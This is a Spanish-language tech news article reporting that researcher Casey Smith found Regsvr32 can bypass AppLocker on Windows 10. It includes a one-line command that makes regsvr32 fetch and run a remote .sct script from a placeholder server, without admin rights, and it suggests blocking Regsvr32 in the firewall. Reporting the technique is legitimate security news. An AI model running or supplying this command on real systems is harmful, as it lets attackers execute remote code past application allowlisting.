Un investigador de Colorado que se hace llamar Casey Smith ha descubierto que Regsvr32 puede usarse para evitar AppLocker en Windows 10, y este es un gran problema para los usuarios de computadoras, especialmente los del entorno empresarial.
AppLocker se introdujo por primera vez en Windows 7 y Windows Server 2008 R2. Está diseñado para permitir a los administradores especificar qué grupo o usuarios pueden aprovechar algunas o todas las aplicaciones basándose en la identidad única de los archivos. Si usted es una persona que tiende a usar AppLocker, entonces debería ser de conocimiento general que se puede usar para crear ciertas reglas para permitir que las aplicaciones se ejecuten o detenerlas en su camino.
Para aquellos que no lo sepan, Regvr32 puede ser usado para registrar y desregistrar DLLs. No se trata de una herramienta de un solo clic, ya que se trata de una utilidad de línea de comandos, por lo que sólo los usuarios avanzados de ordenadores deben intentar sacar partido de lo que ofrece.
Entendemos que el uso de esta técnica no altera el registro del sistema informático, lo que dificulta a los administradores saber si se han realizado cambios.
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
«Lo sorprendente aquí es que regsvr32 ya es consciente del proxy, usa TLS, sigue redirecciones, etc. … Y …. Adivinó un binario de MS firmado y por defecto. Por lo tanto, todo lo que necesita hacer es alojar su archivo.sct en una ubicación que usted controle», Smith escribió.
La técnica anterior no requiere privilegios administrativos y no altera el registro. Además, los scripts pueden ser llamados a través de HTTP o HTTPS. Por el momento, Microsoft no ha lanzado un parche para este pequeño problema, así que la única opción en este momento es bloquear Regsvr32 a través del Firewall de Windows.
Curiosamente, el gigante del software aún no ha respondido sobre este problema de seguridad al que se enfrenta su sistema operativo. Ahora que está a la vista, esperamos escuchar algo de la compañía junto con las conversaciones sobre un futuro parche.